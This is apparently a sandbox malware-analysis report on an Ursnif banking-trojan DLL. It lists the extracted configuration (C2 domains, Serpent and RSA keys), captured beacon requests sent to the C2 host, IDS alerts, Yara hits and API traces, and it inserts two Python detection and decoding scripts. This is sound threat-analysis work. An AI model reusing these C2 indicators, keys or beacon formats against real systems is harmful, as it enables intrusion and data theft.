Source: 00000003.00000003.286056842.0000000000800000.00000040.00000001.sdmp |
Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"} |
Source: 3b17.dll |
Metadefender: Detection: 22% |
Source: 3b17.dll |
ReversingLabs: Detection: 55% |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, |
3_2_00E839C5 |
Source: 3b17.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe |
File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll |
Source: 3b17.dll |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: |
Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49721 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49721 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49723 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49734 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49736 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49736 -> 165.232.183.49:80 |
Source: Joe Sandbox View |
ASN Name: ALLEGHENYHEALTHNETWORKUS |
Source: global traffic |
HTTP traffic detected: GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gtr.antoinfer.com
Connection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: gtr.antoinfer.com |
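The Snort hits above (ET 2033203 "URI Struct M1 (_2B)" and 2033204 "URI Struct M2 (_2F)") and the GET requests they fired on share one structure: an ISFB/Ursnif beacon is base64 text in which '+' has been rewritten to '_2B' and '/' to '_2F', then cut into random-length path segments with '/' (a separator can even land inside a marker, as in 'hvJk_/2BaPz' in the first request). The script below is an added example, not part of the sandbox report and not code from the malware: it takes the c2_domain list and serpent_key from the configuration extractor output at the top of this report, runs the first two beacons and the browser's favicon fetch (copied from the traffic entries above) through a structural check for that URI convention, and cross-checks the Host header against the extracted C2 domains. The segment/length thresholds are this example's own choice. It does not decrypt the payload; that would need the Serpent-CBC step with serpent_key, which is out of scope here.

```python
"""Triage of the report's C2 traffic against its extracted Ursnif config (added example)."""
import re

# Values copied from the report's "Malware Configuration Extractor" line.
REPORT_CONFIG = {
    "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"],
    "botnet": "6000",
    "server": "580",
    "serpent_key": "PNJeXnLTijShJqmR",
}

# (Host, request path) copied from the report's "HTTP traffic detected" entries.
# The third one is Internet Explorer's own favicon fetch to the same host.
REPORT_REQUESTS = [
    ("gtr.antoinfer.com", "/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO"),
    ("gtr.antoinfer.com", "/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD"),
    ("gtr.antoinfer.com", "/favicon.ico"),
]

_SEGMENT = re.compile(r"^[A-Za-z0-9_]+$")   # base64 alphabet minus '+/=' plus the '_' marker


def serpent_key_bits(cfg=REPORT_CONFIG):
    """Serpent takes 128/192/256-bit keys; the extracted key is 16 ASCII bytes."""
    return len(cfg["serpent_key"].encode("ascii")) * 8


def flatten_uri(path):
    """Undo the ISFB URI mangling: drop the inserted '/' separators first (they
    may split a marker), then map '_2B' -> '+' and '_2F' -> '/' to recover the
    base64 text. Padding is not restored; pad before base64-decoding."""
    joined = path.replace("/", "")
    return joined.replace("_2B", "+").replace("_2F", "/")


def uri_features(path):
    segments = [s for s in path.split("/") if s]
    joined = "".join(segments)
    return {
        "segments": len(segments),
        "flat_len": len(flatten_uri(path)),
        "marker_2B": joined.count("_2B"),
        "marker_2F": joined.count("_2F"),
        "charset_ok": bool(segments) and all(_SEGMENT.match(s) for s in segments),
    }


def classify_request(host, path, cfg=REPORT_CONFIG):
    f = uri_features(path)
    f["c2_host"] = host.lower().rstrip(".") in {d.lower() for d in cfg["c2_domain"]}
    # Thresholds are this example's choice; the report's beacons have 20+ segments
    # and 300+ characters of payload, while ordinary paths rarely exceed 8 segments.
    f["uri_struct"] = (
        f["segments"] >= 8
        and f["flat_len"] >= 200
        and f["marker_2B"] + f["marker_2F"] >= 1
        and f["charset_ok"]
    )
    if f["uri_struct"]:
        f["verdict"] = "beacon"
    elif f["c2_host"]:
        f["verdict"] = "c2_host_only"
    else:
        f["verdict"] = "benign"
    return f


def triage(requests=REPORT_REQUESTS, cfg=REPORT_CONFIG):
    """Verdict per request, in input order."""
    return [classify_request(host, path, cfg)["verdict"] for host, path in requests]


if __name__ == "__main__":
    print(f"serpent_key: {serpent_key_bits()}-bit")
    for (host, path), verdict in zip(REPORT_REQUESTS, triage()):
        print(f"{verdict:13s} {host}{path[:48]}...")
```

The favicon request does not match the URI rule (one segment, a '.' in the name), which is the point of keeping the domain check alongside it: the browser fetches the same host the beacon used, and only the extracted c2_domain list catches that. Conversely the URI rule still fires when the operators rotate to a domain the config extractor has not seen.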
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Jul 2021 14:53:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30 |
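The "Data Ascii" rendering of that response is unreadable because the body is both chunked (Transfer-Encoding: chunked) and compressed (Content-Encoding: gzip), as the headers say. The script below is an added example, not part of the report: RAW_HEX is the report's "Data Raw" field copied byte for byte, and the code peels off the chunk framing, sanity-checks the gzip trailer (CRC32 and ISIZE) and inflates the body.

```python
"""Recover the C2 server's 404 body from the report's raw capture (added example)."""
import gzip

# "Data Raw" from the report, verbatim: one chunk of 0x6a bytes, then the last-chunk.
RAW_HEX = (
    "36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 "
    "48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b "
    "b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b "
    "0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f "
    "66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a"
)


def raw_bytes(hex_dump=RAW_HEX):
    return bytes.fromhex(hex_dump)


def dechunk(data):
    """Reassemble an HTTP/1.1 chunked body (RFC 7230 section 4.1):
    hex size [;extensions] CRLF, chunk data, CRLF, ..., '0' CRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0].strip(), 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)                                  # last-chunk reached
        out += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError(f"chunk not CRLF-terminated at offset {pos}")
        pos += 2


def gzip_trailer(member):
    """(CRC32, ISIZE) from the last 8 bytes of a gzip member. ISIZE is the
    uncompressed length mod 2**32, a cheap plausibility check before inflating."""
    return (int.from_bytes(member[-8:-4], "little"),
            int.from_bytes(member[-4:], "little"))


def decode_response_body(hex_dump=RAW_HEX, content_encoding="gzip"):
    body = dechunk(raw_bytes(hex_dump))
    if content_encoding == "gzip":
        body = gzip.decompress(body)      # verifies CRC32 and ISIZE as well
    return body


if __name__ == "__main__":
    member = dechunk(raw_bytes())
    crc, isize = gzip_trailer(member)
    print(f"gzip member: {len(member)} bytes, CRC32=0x{crc:08x}, ISIZE={isize}")
    print(decode_response_body().decode("utf-8", "replace"))
```

The body inflates to 146 bytes (matching ISIZE), a stock nginx "404 Not Found" page. So the capture tells us the server was up and fronted by nginx, but nothing about the C2 protocol beyond that; whatever this beacon earned, it was not a tasking reply.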
Source: rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_ |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC |
Source: ~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr |
String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6 |
Source: rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.dr |
String found in binary or memory: http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B |
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191B9C GetProcAddress,NtCreateSection,memset, |
0_2_6E191B9C |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191EC7 NtMapViewOfSection, |
0_2_6E191EC7 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192485 NtQueryVirtualMemory, |
0_2_6E192485 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E82D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
3_2_00E82D06 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E88005 NtQueryVirtualMemory, |
3_2_00E88005 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192264 |
0_2_6E192264 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EB617 |
0_2_6E1EB617 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F862F |
0_2_6E1F862F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1ED6B0 |
0_2_6E1ED6B0 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1E1727 |
0_2_6E1E1727 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EDC20 |
0_2_6E1EDC20 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E208CB7 |
0_2_6E208CB7 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F0534 |
0_2_6E1F0534 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F8AA2 |
0_2_6E1F8AA2 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E2162C0 |
0_2_6E2162C0 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EAB67 |
0_2_6E1EAB67 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E208B97 |
0_2_6E208B97 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EE050 |
0_2_6E1EE050 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F8861 |
0_2_6E1F8861 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F917A |
0_2_6E1F917A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E82206 |
3_2_00E82206 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E87DE0 |
3_2_00E87DE0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E83109 |
3_2_00E83109 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EB617 |
3_2_6E1EB617 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F862F |
3_2_6E1F862F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F9653 |
3_2_6E1F9653 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1ED6B0 |
3_2_6E1ED6B0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8F15 |
3_2_6E1F8F15 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1E1727 |
3_2_6E1E1727 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EDC20 |
3_2_6E1EDC20 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E208CB7 |
3_2_6E208CB7 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8CD4 |
3_2_6E1F8CD4 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F0534 |
3_2_6E1F0534 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8AA2 |
3_2_6E1F8AA2 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E2162C0 |
3_2_6E2162C0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EAB67 |
3_2_6E1EAB67 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E208B97 |
3_2_6E208B97 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F93EE |
3_2_6E1F93EE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EE050 |
3_2_6E1EE050 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8861 |
3_2_6E1F8861 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F917A |
3_2_6E1F917A |
Source: C:\Windows\System32\loaddll32.exe |
Code function: String function: 6E1DE9F0 appears 35 times |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: String function: 6E1DE9F0 appears 37 times |
|
Source: classification engine |
Classification label: mal80.troj.winDLL@18/8@6/1 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E8513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, |
3_2_00E8513E |
Source: C:\Program Files\internet explorer\iexplore.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High |
Source: C:\Program Files\internet explorer\iexplore.exe |
File created: C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMP |
Source: 3b17.dll |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Program Files\internet explorer\iexplore.exe |
File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\loaddll32.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
